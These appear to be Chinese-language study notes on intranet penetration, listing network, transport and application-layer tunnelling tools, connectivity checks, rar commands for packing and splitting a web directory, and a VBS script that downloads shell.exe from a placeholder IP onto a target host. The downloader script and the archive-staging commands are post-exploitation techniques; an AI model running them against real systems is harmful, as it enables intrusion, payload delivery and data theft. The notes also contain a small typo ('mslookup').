常用隧道
网络层:
IPv6隧道
ICMP隧道
GRE隧道
传输层:
TCP隧道
UDP隧道
常规端口转发
应用层:
SSH隧道
HTTP隧道
HTTPS隧道
DNS隧道
判断内网的连通性
ping www.baidu.com
nc -zv 192.168.1.10 80
curl www.baidu.com:80
//curl的代理模式
curl -x proxy-ip:port www.baidu.com
//windows下的nslookup
mslookup www.baidu.com vps-ip
//linux下的dig
dig @vps-ip www.baidu.com
3.2 网络层隧道技术
IPv6隧道
几种IPv6工具:socat、6tunnel、nt6tunnel
ICMP隧道
icmpsh
https://github.com/inquisb/icmpsh
pingtunnel
https://github.com/esrrhs/pingtunnel
3.3 传输层隧道技术
lcx
nc
powercat
3.4 应用层隧道技术
SSH协议
DNS协议
dnscat2
3.5 SOCKS代理
earthworm
reGeorg
sSocks
SocksCap64
Proxifier
ProxyChains
3.6 压缩数据
rar.exe
将E:\webs\目录下的所有内容打包为1.rar放入E:\webs\目录下
rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\
将E:\webs\1.rar解压到当前根目录下
rar.exe e E:\webs\1.rar
分卷压缩、解压
分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M
rar.exe a -m0 -r -v20m E:\test.rar E:\API
将E:\test.part01.rar解压到E盘的x1目录下
rar.exe x E:\test.part01.rar E:\x1
7-Zip
3.7 上传和下载
FTP
VBS
download.vbs代码:
Set Post=CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")
post.Open "GET","http://IP/shell.exe",0
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(post.responseBody)
aGet.SaveToFile "C:\test\shell.exe",2
执行下面命令即可在目标主机上下载shell.exe文件
Cscript download.vbs